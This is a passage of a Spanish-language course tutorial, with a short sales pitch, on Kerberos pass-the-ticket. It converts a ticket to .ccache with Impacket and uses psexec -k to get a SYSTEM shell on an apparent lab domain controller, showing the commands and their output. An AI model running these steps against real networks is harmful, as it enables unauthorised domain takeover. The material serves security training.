Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!
En entornos Linux/Unix, el proceso implica convertir el ticket a un formato compatible (.ccache). Herramientas como ticketConverter.py de Impacket son esenciales en este proceso. Una vez convertido, se puede utilizar kinit con el archivo .ccache para autenticarse en el entorno Linux/Unix.
kali@kali=> impacket-ticketConverterevil.tckevil.ccacheImpacketv0.11.0-Copyright2023Fortra[*] converting kirbi to ccache...[+] done
Despues de pasar el ticket a CCACHE, debemos establecer la siguiente variable de entorno apuntando a la ruta del archivo en donde se aloja el ticket CCACHE:
Y para validar que se cargaron nuestros permisos basado el ticket podemos ejecutar el siguiente comando:
kali@kali=> impacket-psexec-k-no-pass-target-ip18.191.44.143-dc-ip18.191.44.143first-dc.spartancybersec.corpImpacketv0.11.0-Copyright2023Fortra[*] Requesting shares on 18.191.44.143.....[*] Found writable share ADMIN$[*] Uploading file DFiDMQsg.exe[*] Opening SVCManager on 18.191.44.143.....[*] Creating service uYJy on 18.191.44.143.....[*] Starting service uYJy.....[!] Press help for extra shell commandsMicrosoftWindows [Version 10.0.17763.3406](c) 2018MicrosoftCorporation.Allrightsreserved.C:\Windows\system32> whoamintauthority\systemC:\Windows\system32> hostnameFirst-DCC:\Windows\system32> ipconfigWindowsIPConfigurationEthernetadapterEthernet:Connection-specificDNSSuffix.:spartancybersec.corpLink-localIPv6Address.....:fe80::dc16:bad5:b35:e9e9%4IPv4Address...........:10.0.1.100SubnetMask...........:255.255.255.0DefaultGateway.........:10.0.1.1
En la evidencia previa, estamos usando impacket con el parametro -k podemos autenticarnos por PSEXEC sobre el First-DC.
